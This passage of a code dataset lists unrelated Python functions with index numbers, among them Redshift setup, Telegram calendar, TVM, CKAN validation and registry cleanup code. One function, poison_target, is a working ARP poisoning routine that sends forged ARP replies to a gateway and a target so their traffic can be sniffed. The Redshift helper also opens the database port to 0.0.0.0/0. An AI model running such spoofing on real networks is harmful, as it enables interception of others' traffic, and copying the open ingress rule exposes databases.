this_time_unix_sec = None
image_file_name_matrix[i, j, k] = find_storm_image_file(
top_directory_name=top_directory_name,
unix_time_sec=this_time_unix_sec,
spc_date_string=valid_spc_date_strings[i],
radar_source=radar_utils.GRIDRAD_SOURCE_ID,
radar_field_name=radar_field_names[j],
radar_height_m_agl=radar_heights_m_agl[k],
raise_error_if_missing=True)
file_dict.update({
IMAGE_FILE_NAMES_KEY: image_file_name_matrix,
VALID_TIMES_KEY: valid_times_unix_sec
})
return file_dict | 5,334,228 |
def cli_num_postproc_workers(
usage_help: str = "Number of workers to post-process the network output.",
default: int = 0,
) -> callable:
"""Enables --num-postproc-workers option for cli."""
return click.option(
"--num-postproc-workers",
help=add_default_to_usage_help(usage_help, default),
type=int,
default=default,
) | 5,334,229 |
def create_cluster(redshift, iam, ec2, cluster_config, wait_status=False):
""" Create publicly available redshift cluster per provided cluster configuration.
:param redshift: boto.redshift object to use
:param iam: boto.iam object to use
:param ec2: boto.ec2 object to use
:param cluster_config: configparser cluster configuration, from manage_cluster.cfg file
:param wait_status: bool, default is False. Should function wait and repeatedly check if cluster has
reached its desired state.
:return: Returns JSON, if successful, otherwise displays error and returns integer 1
"""
print("Attempting to create a new IAM Role")
iam_role_name = cluster_config['iam_role_name']
try:
iam.create_role(
Path='/',
RoleName=iam_role_name,
Description="Allows Redshift clusters to call AWS services on your behalf.",
AssumeRolePolicyDocument=json.dumps({
'Statement': [
{
'Action': 'sts:AssumeRole',
'Effect': 'Allow',
'Principal': {
'Service': 'redshift.amazonaws.com'
}
}
],
'Version': '2012-10-17'
})
)
print(f"Role '{iam_role_name}' created")
except iam.exceptions.EntityAlreadyExistsException:
print("Role already exists")
print("Attaching AmazonS3ReadOnlyAccess policy to the role")
iam.attach_role_policy(
RoleName=iam_role_name,
PolicyArn="arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
)
print("Retrieving role ARN")
aws_role_arn = iam.get_role(RoleName=cluster_config['iam_role_name'])['Role']['Arn']
print(f"Role ARN: {aws_role_arn}")
try:
redshift.create_cluster(
# HW
ClusterType=cluster_config['cluster_type'],
NodeType=cluster_config['node_type'],
NumberOfNodes=int(cluster_config['num_nodes']),
# Identifiers & Credentials
DBName=cluster_config['db_name'],
ClusterIdentifier=cluster_config['cluster_identifier'],
MasterUsername=cluster_config['db_user'],
MasterUserPassword=cluster_config['db_password'],
# Roles (for s3 access)
IamRoles=[aws_role_arn]
)
except Exception as e:
print(f"ERROR: {e}")
return 1
if wait_status:
expected_status = 'available'
else:
expected_status = None
cluster_info = get_cluster_status(
redshift,
cluster_config['cluster_identifier'],
expected_status=expected_status
)
print(f"DWH_ENDPOINT :: {cluster_info['Endpoint']['Address']}")
print(f"DWH_ROLE_ARN :: {cluster_info['IamRoles'][0]['IamRoleArn']}")
vpc_id = cluster_info['VpcId']
vpc_cidr_ip = '0.0.0.0/0'
vpc_ip_proto = 'TCP'
vpc_port = int(cluster_config['db_port'])
try:
vpc = ec2.Vpc(id=vpc_id)
default_sec_group = list(vpc.security_groups.all())[0]
print(default_sec_group)
default_sec_group.authorize_ingress(
GroupName=default_sec_group.group_name,
CidrIp=vpc_cidr_ip,
IpProtocol=vpc_ip_proto,
FromPort=vpc_port,
ToPort=vpc_port
)
print(f"VPC {vpc_id} access has been granted to {vpc_ip_proto} {vpc_cidr_ip} "
f"for port {vpc_port}")
except Exception as e:
print(f"ERROR: {e}")
return 1 | 5,334,230 |
def index():
""" Application entry point. """
return render_template("index.html") | 5,334,231 |
def add_filepath(parent, filename, definition=''):
"""returns the path to filename under `parent`."""
if filename is None:
raise ValueError("filename cannot be None")
# FIXME implementation specifics! only works with FileSystemDatabase
parent_path = parent._repr
file_path = parent_path / filename
parent.attrs[f'{file_path.name}/{DEFINITION_KEY}'] = definition
parent.attrs[f'{file_path.name}/{TYPE_KEY}'] = FILE_TYPE
parent.attrs.commit()
return file_path | 5,334,232 |
def silhouette_to_prediction_function(
silhouette: np.ndarray
) -> Callable[[np.ndarray], bool]:
"""
Takes a silhouette and returns a function.
The returned function takes x,y point and
returns wether it is in the silhouette.
Args:
silhouette:
Returns:
"""
def prediction_function(point: np.ndarray) -> bool:
        try:
            return silhouette[int(point[0]), int(point[1])]
        except IndexError:
            return False
return prediction_function | 5,334,233 |
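# A usage sketch for silhouette_to_prediction_function with a boolean mask:
# points that index outside the array bounds fall through to False.
import numpy as np

silhouette = np.zeros((4, 4), dtype=bool)
silhouette[1:3, 1:3] = True
inside = silhouette_to_prediction_function(silhouette)
print(inside(np.array([1.2, 2.7])))   # True  (indexes [1, 2])
print(inside(np.array([0.0, 0.0])))   # False
print(inside(np.array([10.0, 0.0])))  # False (out of bounds)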
def create_calendar(year=None, month=None):
"""
Create an inline keyboard with the provided year and month
"""
now = datetime.datetime.now()
if year is None:
year = now.year
if month is None:
month = now.month
data_ignore = create_calendar_callback_data("IGNORE", year, month, 0)
keyboard = []
# First row - Month and Year
row = [
InlineKeyboardButton(
calendar.month_name[month] + " " + str(year), callback_data=data_ignore
)
]
keyboard.append(row)
# Second row - Week Days
row = []
for day in ["Mo", "Tu", "We", "Th", "Fr", "Sa", "Su"]:
row.append(InlineKeyboardButton(day, callback_data=data_ignore))
keyboard.append(row)
my_calendar = calendar.monthcalendar(year, month)
for week in my_calendar:
row = []
for day in week:
if day == 0:
row.append(InlineKeyboardButton(" ", callback_data=data_ignore))
else:
row.append(
InlineKeyboardButton(
str(day),
callback_data=create_calendar_callback_data(
"DAY", year, month, day
),
)
)
keyboard.append(row)
# Last row - Buttons
row = [
InlineKeyboardButton(
"<",
callback_data=create_calendar_callback_data("PREV-MONTH", year, month, day),
),
InlineKeyboardButton(" ", callback_data=data_ignore),
InlineKeyboardButton(
">",
callback_data=create_calendar_callback_data("NEXT-MONTH", year, month, day),
),
]
keyboard.append(row)
return InlineKeyboardMarkup(keyboard) | 5,334,234 |
def read_image(link, size):
""" Read image on link and convert it to given size
Usage:
        image = read_image(link, size)
Input variables:
link: path to image
size: output size of image
Output variables:
image: read and resized image
"""
image = imageio.imread(link)
image = trf.resize(image, size)
return image | 5,334,235 |
def make_send_data(application_preset):
"""Generate the data to send to the protocol."""
if application_preset == 'none':
# data = bytes([i for i in range(32)])
# data = bytes([i for i in range(54)]) # for teensy 4.0
data = bytes([i for i in range(54)]) # for teensy lc & micro
data_kwargs = {}
else:
if application_preset == 'pubsub':
# (data, schema) = (tuple(i for i in range(185 - 18)), 0x60) # for due and teensy 4.0
(data, schema) = (tuple(i for i in range(50 - 24)), 0x60) # for teensy lc & micro
# (data, schema) = (tuple(i for i in range(50 - 18)), 0x60) # for uno
data = (b'echo', data)
# data = (b'copy', data)
# data = (b'reply', data)
# data = (b'ping', data)
# (data, schema) = ((b'blink', True), 0x02)
# (data, schema) = ((b'blink', False), 0x02)
# (data, schema) = ((b'prefix', ('world!', 'Hello, ')), 0x00)
elif application_preset == 'minimal':
# (data, schema) = (tuple(i for i in range(185 - 18)), 0x60) # for due and teensy 4.0
(data, schema) = (tuple(i for i in range(50 - 24)), 0x60) # for teensy lc & micro
# (data, schema) = (tuple(i for i in range(50 - 18)), 0x60) # for uno
(data, schema) = (('hello', True, None, 0.125, b'\x00\x01\x02\x03\x04') + data, 0x00)
# (data, schema) = (('hello', 123, 456, 789), 0x00)
else:
raise NotImplementedError('Unsupported protocol configuration!')
data_kwargs = {
'schema': schema,
'format': SERIALIZATION_FORMATS[('binary', 'dynamic', 'msgpack')],
'type': DATA_TYPES[('presentation', 'document')]
}
return (data, data_kwargs) | 5,334,236 |
def dp4a(x_scope="local", y_scope="local", z_scope="local", dtypes=("int8", "int8")):
"""
Int8 dot product reduced by every 4 elements using __dp4a
Parameters
----------
x_scope : str, optional
The storage scope of buffer for lhs
y_scope : str, optional
The storage scope of buffer for rhs
z_scope : str, optional
The storage scope of buffer for result
dtypes: tuple of strs, optional
The dtype of x and y
Returns
-------
intrin : TensorIntrin
The dp4a TensorIntrin that can be used in tensorizing schedule.
"""
n = 4 # dp4a requires operands packed by 4
result_dtype = "int32" if dtypes[1] == "int8" else "uint32"
x = te.placeholder((n,), name="x", dtype=dtypes[0])
y = te.placeholder((n,), name="y", dtype=dtypes[1])
k = te.reduce_axis((0, n), name="rc")
z = te.compute(
(1,), lambda i: te.sum(x[k].astype(result_dtype) * y[k].astype(result_dtype), axis=[k])
)
def _intrin_func(ins, outs):
def _instr(index):
xx, yy = ins
zz = outs[0]
zz_dtype = zz.dtype
if index == 1:
return zz.vstore(0, tvm.tir.const(0, zz_dtype))
ib = tvm.tir.ir_builder.create()
vec_x_dtype = "int8x4" if xx.dtype == "int8" else "uint8x4"
vec_y_dtype = "int8x4" if yy.dtype == "int8" else "uint8x4"
vec_x = xx.vload(0, dtype=vec_x_dtype)
vec_y = yy.vload(0, dtype=vec_y_dtype)
prev_z = 0 if index == 0 else zz.vload(0)
if is_target("rocm"):
# TODO(masahi): Here we are assuming that we are compiling for gfx10 or later
# We can refine the specification for dot product on rocm if needed later.
# We can just use "llvm.amdgcn.udot4" for u8u8u32, but it is not tested.
                assert (
                    dtypes[0] == "int8" and dtypes[1] == "int8"
                ), "u8u8u32 dot product for rocm not supported yet"
new_z = tvm.tir.call_llvm_pure_intrin(
zz_dtype,
"llvm.amdgcn.sdot4",
tvm.tir.const(4, "uint32"),
tvm.tir.call_intrin("int32", "tir.reinterpret", vec_x),
tvm.tir.call_intrin("int32", "tir.reinterpret", vec_y),
prev_z,
True,
)
else:
new_z = tvm.tir.call_pure_extern(zz_dtype, "__dp4a", vec_x, vec_y, prev_z)
ib.emit(zz.vstore(0, new_z))
return ib.get()
return _instr(0), _instr(1), _instr(2) # body, reset, update
default_buffer_params = {"data_alignment": 4, "offset_factor": 1}
scopes = {x: x_scope, y: y_scope, z: z_scope}
binds = {
t: tvm.tir.decl_buffer(
t.shape, t.dtype, t.op.name, scope=scopes[t], **default_buffer_params
)
for t in [x, y, z]
}
return te.decl_tensor_intrin(
z.op, _intrin_func, binds=binds, default_buffer_params=default_buffer_params
) | 5,334,237 |
def _bytes_iterator_py2(bytes_):
"""
Returns iterator over a bytestring in Python 2.
Do not call directly, use bytes_iterator instead
"""
for b in bytes_:
yield b | 5,334,238 |
def test_and():
"""Test the and instruction."""
and_regex = Instructions["and"].regex
assert re.match(and_regex, "and $t1, $t2, $t1") is not None
assert re.match(and_regex, "and $t1, $t2") is None
assert re.match(and_regex, "and $t1, $t2, 33") is None | 5,334,239 |
def fileexists(filename):
"""Replacement method for os.stat."""
    try:
        f = open(filename, 'r')
        f.close()
        return True
    except (IOError, OSError):
        pass
return False | 5,334,240 |
def debug_print(message, *args):
""" Method similar to LOGGER.log, but also replaces all TF ops/tensors with their names
e.g. debug_print('see tensors %s for %s', tensor_list, [1,2,3])
"""
if not DEBUG_LOGGING:
return
LOGGER.debug(message, *[format_ops(arg) for arg in args]) | 5,334,241 |
def test_knowledge_graph_init(graph_mutation_client, graph_mutation_responses):
"""Test knowldge graph client initialization."""
return graph_mutation_client.named_types | 5,334,242 |
def read_camera_matrix(filename):
"""
Read camera matrix from text file exported by PhotoScan
"""
with open(filename, 'r') as f:
s = f.read()
s = s.split(',')
    s = [x.strip('\\Matrix([[') for x in s]
s = [x.strip(']])') for x in s]
s = [x.strip('[') for x in s]
s = [x.strip(']') for x in s]
s = [x.strip('\n [') for x in s]
M = np.array([float(x) for x in s])
return M.reshape((4,4)) | 5,334,243 |
def level_18():
"""
Challenge 18: Telling the difference with deltas
URL: http://www.pythonchallenge.com/pc/return/balloons.html
Split lines from [0:53] and [56:109]
"""
deltas = open('text/lv18-delta.txt', 'r').read()
lines = deltas.splitlines()
left, right, png = [], [], ['', '', '']
# Separate the values by columns 53 and 56
for i in lines:
left.append(i[0:53])
right.append(i[56:109])
# Compare the difference between left and right
diff = list(difflib.ndiff(left, right))
for row in diff:
symbol = row[0]
# Convert each number into ascii data
for vals in row[2:].split():
byte = chr(int(vals, 16))
if symbol == '-':
png[0] += ''.join(byte)
elif symbol == '+':
png[1] += ''.join(byte)
elif symbol == ' ':
png[2] += ''.join(byte)
# Save into image png
for i in range(3):
with open('images/lv18-pic%d.png' % i, 'wb') as img:
img.write(png[i])
print "Finished writing binary to PNG in images." | 5,334,244 |
def plot_boxplots(data, hidden_states):
"""
Plot boxplots for all variables in the dataset, per state
Parameters
------
data : pandas DataFrame
Data to plot
    hidden_states: iterable
the hidden states corresponding to the timesteps
"""
column_names = data.columns
figs, axes = plt.subplots(len(column_names), figsize=(15, 15))
for j, var in enumerate(column_names):
axes[j].set_title(var)
vals = data[var]
data_to_plot = []
labels = []
for i in set(hidden_states):
mask = hidden_states == i
if (sum(mask) > 0):
labels.append(str(i))
values = np.array(vals[mask])
data_to_plot.append(values)
axes[j].boxplot(data_to_plot, sym='', labels=labels) | 5,334,245 |
def find_child_joints(model, joint_name):
""" Find all the joints parented to the given joint. """
joint_id = joint_name_to_index(model)
link_id = link_name_to_index(model)
# FIXME : Add exception to catch invalid joint names
joint = model.joints[joint_id[joint_name]]
clink = joint.child
return [
j.name for j in model.joints if j.parent == clink
] | 5,334,246 |
def main():
"""cli entrypoint"""
parser = argparse.ArgumentParser(description="Cleanup docker registry")
parser.add_argument("-i", "--image",
dest="image",
required=True,
help="Docker image to cleanup")
parser.add_argument("-v", "--verbose",
dest="verbose",
action="store_true",
help="verbose")
parser.add_argument("-n", "--dry-run",
dest="dry_run",
action="store_true",
help="Dry run")
parser.add_argument("-f", "--force",
dest="force",
action="store_true",
help="Force delete (deprecated)")
parser.add_argument("-p", "--prune",
dest="prune",
action="store_true",
help="Prune")
parser.add_argument("-u", "--untagged",
dest="untagged",
action="store_true",
help="Delete all untagged blobs for image")
args = parser.parse_args()
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(u'%(levelname)-8s [%(asctime)s] %(message)s'))
logger.addHandler(handler)
if args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# make sure not to log before logging is setup. that'll hose your logging config.
if args.force:
logger.info(
"You supplied the force switch, which is deprecated. It has no effect now, and the script defaults to doing what used to be only happen when force was true")
splitted = args.image.split(":")
if len(splitted) == 2:
image = splitted[0]
tag = splitted[1]
else:
image = args.image
tag = None
if 'REGISTRY_DATA_DIR' in os.environ:
registry_data_dir = os.environ['REGISTRY_DATA_DIR']
else:
registry_data_dir = "/opt/registry_data/docker/registry/v2"
try:
cleaner = RegistryCleaner(registry_data_dir, dry_run=args.dry_run)
if args.untagged:
cleaner.delete_untagged(image)
else:
if tag:
tag_count = cleaner.get_tag_count(image)
if tag_count == 1:
cleaner.delete_entire_repository(image)
else:
cleaner.delete_repository_tag(image, tag)
else:
cleaner.delete_entire_repository(image)
if args.prune:
cleaner.prune()
except RegistryCleanerError as error:
logger.fatal(error)
sys.exit(1) | 5,334,247 |
def stem(path: str) -> str:
"""returns the stem of a path (path without parent directory and without extension)
    e.g.
j.sals.fs.stem("/tmp/tmp-5383p1GOmMOOwvfi.tpl") -> 'tmp-5383p1GOmMOOwvfi'
Args:
path (str): path we want to get its stem
Returns:
str: path without parent directory and without extension
"""
return pathlib.Path(path).stem | 5,334,248 |
def fluent_text(field, schema):
"""
Accept multilingual text input in the following forms
and convert to a json string for storage:
1. a multilingual dict, eg.
{"en": "Text", "fr": "texte"}
2. a JSON encoded version of a multilingual dict, for
compatibility with old ways of loading data, eg.
'{"en": "Text", "fr": "texte"}'
3. separate fields per language (for form submissions):
fieldname-en = "Text"
fieldname-fr = "texte"
When using this validator in a ckanext-scheming schema setting
"required" to true will make all form languages required to
pass validation.
"""
# combining scheming required checks and fluent field processing
# into a single validator makes this validator more complicated,
# but should be easier for fluent users and eliminates quite a
# bit of duplication in handling the different types of input
required_langs = []
alternate_langs = {}
if field and field.get('required'):
required_langs = fluent_form_languages(field, schema=schema)
alternate_langs = fluent_alternate_languages(field, schema=schema)
def validator(key, data, errors, context):
# just in case there was an error before our validator,
# bail out here because our errors won't be useful
if errors[key]:
return
value = data[key]
# 1 or 2. dict or JSON encoded string
if value is not missing:
if isinstance(value, basestring):
try:
value = json.loads(value)
except ValueError:
errors[key].append(_('Failed to decode JSON string'))
return
except UnicodeDecodeError:
errors[key].append(_('Invalid encoding for JSON string'))
return
if not isinstance(value, dict):
errors[key].append(_('expecting JSON object'))
return
for lang, text in value.iteritems():
try:
m = re.match(BCP_47_LANGUAGE, lang)
except TypeError:
errors[key].append(_('invalid type for language code: %r')
% lang)
continue
if not m:
errors[key].append(_('invalid language code: "%s"') % lang)
continue
if not isinstance(text, basestring):
errors[key].append(_('invalid type for "%s" value') % lang)
continue
if isinstance(text, str):
try:
value[lang] = text.decode('utf-8')
except UnicodeDecodeError:
                        errors[key].append(_('invalid encoding for "%s" value')
                                           % lang)
for lang in required_langs:
if value.get(lang) or any(
value.get(l) for l in alternate_langs.get(lang, [])):
continue
errors[key].append(_('Required language "%s" missing') % lang)
if not errors[key]:
data[key] = json.dumps(value)
return
# 3. separate fields
output = {}
prefix = key[-1] + '-'
extras = data.get(key[:-1] + ('__extras',), {})
for name, text in extras.iteritems():
if not name.startswith(prefix):
continue
lang = name.split('-', 1)[1]
m = re.match(BCP_47_LANGUAGE, lang)
if not m:
errors[name] = [_('invalid language code: "%s"') % lang]
output = None
continue
if output is not None:
output[lang] = text
for lang in required_langs:
if extras.get(prefix + lang) or any(
extras.get(prefix + l) for l in alternate_langs.get(lang, [])):
continue
errors[key[:-1] + (key[-1] + '-' + lang,)] = [_('Missing value')]
output = None
if output is None:
return
for lang in output:
del extras[prefix + lang]
data[key] = json.dumps(output)
return validator | 5,334,249 |
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Tasmota sensor dynamically through discovery."""
@callback
def async_discover(
tasmota_entity: HATasmotaEntity, discovery_hash: DiscoveryHashType
) -> None:
"""Discover and add a Tasmota sensor."""
async_add_entities(
[
TasmotaSensor(
tasmota_entity=tasmota_entity, discovery_hash=discovery_hash
)
]
)
hass.data[
DATA_REMOVE_DISCOVER_COMPONENT.format(sensor.DOMAIN)
] = async_dispatcher_connect(
hass,
TASMOTA_DISCOVERY_ENTITY_NEW.format(sensor.DOMAIN),
async_discover,
) | 5,334,250 |
def palette_color_brewer_q_Set3(reverse=False):
"""Generate set3 Brewer palette of a given size ... interpolate as needed ... best for discrete mapping
Args:
reverse: order the colors backward as compared to standard Brewer palette
Returns:
lambda: generates a list of colors
See Also:
:meth:`gen_node_color_map`, :meth:`gen_edge_color_map`
"""
return lambda value_count: _palette_color_brewer(value_count, colorbrewer.Set3, reverse) | 5,334,251 |
def process_file(path, proc_mode, series=None, subimg_offset=None,
subimg_size=None, roi_offset=None, roi_size=None):
"""Processes a single image file non-interactively.
Assumes that the image has already been set up.
Args:
path (str): Path to image from which MagellanMapper-style paths will
be generated.
proc_mode (str): Processing mode, which should be a key in
:class:`config.ProcessTypes`, case-insensitive.
series (int): Image series number; defaults to None.
subimg_offset (List[int]): Sub-image offset as (z,y,x) to load;
defaults to None.
subimg_size (List[int]): Sub-image size as (z,y,x) to load;
defaults to None.
roi_offset (List[int]): Region of interest offset as (x, y, z) to
process; defaults to None.
roi_size (List[int]): Region of interest size of region to process,
given as (x, y, z); defaults to None.
Returns:
Tuple of stats from processing, or None if no stats, and
text feedback from the processing, or None if no feedback.
"""
# PROCESS BY TYPE
stats = None
fdbk = None
filename_base = importer.filename_to_base(path, series)
proc_type = libmag.get_enum(proc_mode, config.ProcessTypes)
print("{}\n".format("-" * 80))
if proc_type is config.ProcessTypes.LOAD:
# loading completed
return None, None
    elif proc_type is config.ProcessTypes.IMPORT_ONLY:
        # already imported so does nothing
        print("imported {}, will exit".format(path))
elif proc_type is config.ProcessTypes.EXPORT_ROIS:
# export ROIs; assumes that info_proc was already loaded to
# give smaller region from which smaller ROIs from the truth DB
# will be extracted
from magmap.io import export_rois
db = config.db if config.truth_db is None else config.truth_db
export_rois.export_rois(
db, config.image5d, config.channel, filename_base,
config.plot_labels[config.PlotLabels.PADDING],
config.unit_factor, config.truth_db_mode,
os.path.basename(config.filename))
elif proc_type is config.ProcessTypes.TRANSFORM:
# transpose, rescale, and/or resize whole large image
transformer.transpose_img(
path, series, plane=config.plane,
rescale=config.transform[config.Transforms.RESCALE],
target_size=config.roi_size)
elif proc_type in (
config.ProcessTypes.EXTRACT, config.ProcessTypes.ANIMATED):
# generate animated GIF or extract single plane
export_stack.stack_to_img(
config.filenames, roi_offset, roi_size, series, subimg_offset,
subimg_size, proc_type is config.ProcessTypes.ANIMATED,
config.suffix)
elif proc_type is config.ProcessTypes.EXPORT_BLOBS:
# export blobs to CSV file
from magmap.io import export_rois
export_rois.blobs_to_csv(config.blobs.blobs, filename_base)
elif proc_type in (
config.ProcessTypes.DETECT, config.ProcessTypes.DETECT_COLOC):
# detect blobs in the full image, +/- co-localization
coloc = proc_type is config.ProcessTypes.DETECT_COLOC
stats, fdbk, _ = stack_detect.detect_blobs_stack(
filename_base, subimg_offset, subimg_size, coloc)
elif proc_type is config.ProcessTypes.COLOC_MATCH:
if config.blobs is not None and config.blobs.blobs is not None:
# colocalize blobs in separate channels by matching blobs
shape = (config.image5d.shape[1:] if subimg_size is None
else subimg_size)
matches = colocalizer.StackColocalizer.colocalize_stack(
shape, config.blobs.blobs)
# insert matches into database
colocalizer.insert_matches(config.db, matches)
else:
print("No blobs loaded to colocalize, skipping")
elif proc_type in (config.ProcessTypes.EXPORT_PLANES,
config.ProcessTypes.EXPORT_PLANES_CHANNELS):
# export each plane as a separate image file
export_stack.export_planes(
config.image5d, config.savefig, config.channel,
proc_type is config.ProcessTypes.EXPORT_PLANES_CHANNELS)
elif proc_type is config.ProcessTypes.EXPORT_RAW:
# export the main image as a raw data file
out_path = libmag.combine_paths(config.filename, ".raw", sep="")
libmag.backup_file(out_path)
np_io.write_raw_file(config.image5d, out_path)
elif proc_type is config.ProcessTypes.PREPROCESS:
# pre-process a whole image and save to file
# TODO: consider chunking option for larger images
profile = config.get_roi_profile(0)
out_path = config.prefix
if not out_path:
out_path = libmag.insert_before_ext(config.filename, "_preproc")
transformer.preprocess_img(
config.image5d, profile["preprocess"], config.channel, out_path)
return stats, fdbk | 5,334,252 |
def get_loss_function(identifier):
"""
Gets the loss function from `identifier`.
:param identifier: the identifier
:type identifier: str or dict[str, str or dict]
:raise ValueError: if the function is not found
:return: the function
:rtype: function
"""
return _get(identifier, loss_functions, tensorflow.keras.losses.get,
name_only=True) | 5,334,253 |
def find_defender(ships, side):
"""Crude method to find something approximating the best target when attacking"""
enemies = [x for x in ships if x['side'] != side and x['hp'] > 0]
if not enemies:
return None
# shoot already wounded enemies first
wounded = [x for x in enemies if x['hp'] < x['size']]
if wounded:
found = ships.index(wounded[0])
return found
# shoot boarders in priority (?)
boarding = [x for x in enemies if 'Boarding' in x['name']]
if boarding:
found = ships.index(boarding[0])
return found
# shoot 1 hp ships
hp_1 = [x for x in enemies if x['size'] == 1]
if hp_1:
found = ships.index(hp_1[0])
return found
# shoot 2 hp ships
hp_2 = [x for x in enemies if x['size'] == 2]
if hp_2:
found = ships.index(hp_2[0])
return found
# otherwise just shoot the first one (??!)
found = ships.index(enemies[0])
return found | 5,334,254 |
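# A usage sketch for find_defender's targeting priority with hypothetical ship
# dicts: wounded enemies are targeted first, ahead of boarders and small ships.
ships = [
    {"name": "Frigate", "side": 0, "hp": 3, "size": 3},
    {"name": "Boarding Party", "side": 1, "hp": 2, "size": 2},
    {"name": "Sloop", "side": 1, "hp": 1, "size": 2},  # wounded
]
print(find_defender(ships, side=0))  # 2 -> the wounded Sloop is shot first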
def get_parameters(image_path):
"""
Parses the image path to dictionary
:param str image_path: image path
:rtype dict
"""
image_directory = os.path.dirname(image_path)
image_filename = os.path.basename(image_path)
image_name = image_filename.split('.')[0]
image_extension = image_filename.split('.')[-1]
return {
'directory': image_directory,
'extension': image_extension,
'name': image_name,
'filename': image_filename,
'path': image_path
} | 5,334,255 |
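# A quick usage sketch for get_parameters:
print(get_parameters("/data/images/photo.jpg"))
# {'directory': '/data/images', 'extension': 'jpg', 'name': 'photo',
#  'filename': 'photo.jpg', 'path': '/data/images/photo.jpg'}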
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
"""
对网关和目标进行投毒攻击后,我们就能嗅探到目标机器进出的流量了
:param gateway_ip:
:param gateway_mac:
:param target_ip:
:param target_mac:
:return:
"""
global poisoning
# 构建欺骗目标IP的ARP请求
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
    # Build the ARP reply that poisons the gateway (spoofing the target IP)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
    # Keep sending the ARP replies in a loop
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print "[*] ARP poison attack finished."
return | 5,334,256 |
def Create_clump_summaries(feature_file,simplify_threshold):
""" Employs Panda Shapely library to simplify polygons by eliminating almost
colinear vertices. Generates two data structures: First - sort_clump_df: Panda Dataframe
containing the longest line in the simplified and unsimplified polygon, polygon area,
polygon number by order listed in feature_file. The Dataframe is sorted by
length of longest edge of simplified polygon. Second - polygon_dict which
is a dictionary with numpy arrays representing normalized polygons """
i= 0
clump_dict = {'clump':[],'area':[], 'max_line':[], 'max_line_simplify':[]}
polygon_dict ={}
with open(feature_file) as input_file2:
reader = csv.DictReader(input_file2)
for row1 in reader:
row1_polygon = row1['Polygon']
row1_polygon = row1_polygon[1:len(row1_polygon)-1]
row1_polygon_list = row1_polygon.split(':')
row1_polygon_list = [float(x) for x in row1_polygon_list]
even_pts = row1_polygon_list[0:len(row1_polygon_list)-1:2]
odd_pts = row1_polygon_list[1:len(row1_polygon_list):2]
row1_tuples = list(zip(even_pts,odd_pts))
# clump represents the polygon representing each clump
clump = Polygon(row1_tuples)
# Invoke Shapely to generate simplified polygon
clump2 = clump.simplify(simplify_threshold)
# Obtain points defining polygon, compute length of edges
npclump = np.array(clump.exterior)
npclump_shift = np.roll(npclump,1,axis=0)
diff_clump = npclump_shift - npclump
l2_clump = np.sqrt(((diff_clump**2).sum(axis=1)))
max_l2_clump = l2_clump.max()
npclump2 = np.array(clump2.exterior)
npclump2_shift = np.roll(npclump2,1,axis=0)
diff_clump2 = npclump2_shift - npclump2
l2_clump2 = np.sqrt(((diff_clump2**2).sum(axis=1)))
max_l2_clump2 = l2_clump2.max()
clump_dict['clump'].append(i)
clump_dict['max_line'].append(max_l2_clump)
clump_dict['area'].append(clump.area)
clump_dict['max_line_simplify'].append(max_l2_clump2)
# shift x and y polygon axis
polygon_dict[i] = npclump2 - npclump2.min(axis=0)
print('\n number', i, '\n area',clump.area, 'clump max line',max_l2_clump, 'simplified clump max line', max_l2_clump2)
i +=1
num_clumps = i-1
clump_df = pd.DataFrame(clump_dict)
sort_clump_df = clump_df.sort_values(by='max_line_simplify',ascending = False)
sort_clump_df.reset_index(inplace=True)
return sort_clump_df,polygon_dict, num_clumps | 5,334,257 |
def norm(point):
"""Returns the Euclidean norm of a point from origin.
Parameters
==========
point: This denotes a point in the dimensional space.
Examples
========
>>> from sympy.integrals.intpoly import norm
>>> from sympy.geometry.point import Point
>>> norm(Point(2, 7))
sqrt(53)
"""
half = S(1)/2
if isinstance(point, tuple):
return (point[0] ** 2 + point[1] ** 2) ** half
elif isinstance(point, Point):
return (point.x ** 2 + point.y ** 2) ** half
elif isinstance(point, dict):
return sum(i**2 for i in point.values()) ** half | 5,334,258 |
def read_reducing():
"""Return gas resistance for reducing gases.
    E.g. hydrogen, carbon monoxide.
"""
setup()
return read_all().reducing | 5,334,259 |
def access_rights_to_metax(data):
"""
    Cherry-picks access rights data from the frontend form data and makes it
    comply with the Metax schema.
    Arguments:
        data {object} -- The whole object sent from the frontend.
    Returns:
        object -- Access rights object that complies with the Metax schema.
"""
access_rights = {}
if "license" in data:
access_rights["license"] = []
if "identifier" in data["license"] and data["license"]["identifier"] != 'other':
license_object = {}
license_object["identifier"] = data["license"]["identifier"]
access_rights["license"].append(license_object)
elif "otherLicenseUrl" in data:
license_object = {}
license_object["license"] = data["otherLicenseUrl"]
access_rights["license"].append(license_object)
if "accessType" in data:
access_rights["access_type"] = {}
access_rights["access_type"]["identifier"] = data["accessType"]["url"]
if data["accessType"]["url"] != access_type["OPEN"]:
access_rights["restriction_grounds"] = []
access_rights["restriction_grounds"].append({"identifier": data["restrictionGrounds"]})
if data["accessType"]["url"] == access_type["EMBARGO"] and "embargoDate" in data:
access_rights["available"] = data["embargoDate"]
return access_rights | 5,334,260 |
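# Input/output sketch. The access_type mapping is assumed to be a
# module-level dict of reference-data URLs, as used in the function above;
# the license identifier below is a placeholder.
form_data = {
    "license": {"identifier": "https://example.org/license/cc-by-4.0"},
    "accessType": {"url": access_type["OPEN"]},
}
metax_rights = access_rights_to_metax(form_data)
# -> {"license": [{"identifier": "https://example.org/license/cc-by-4.0"}],
#     "access_type": {"identifier": access_type["OPEN"]}}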
def read_toml_file(input_file, config_name = None, confpaths = [".", TCFHOME + "/" + "config"]):
"""
    Function to read a toml file; returns its parsed content.
    Parameters:
    - input_file is the toml file to be read
    - config_name is a particular configuration entry to pull
    - confpaths is the list of directories searched for the toml file
"""
conffiles = [input_file]
config = pconfig.parse_configuration_files(conffiles, confpaths)
if config_name is None:
return config
else :
result = config.get(config_name)
if result is None:
logger.error("%s is missing in toml file %s", config_name, input_file )
return None
else :
return result | 5,334,261 |
def assert_images_equal(image_1: str, image_2: str):
"""
    Assert whether two images are the same.
"""
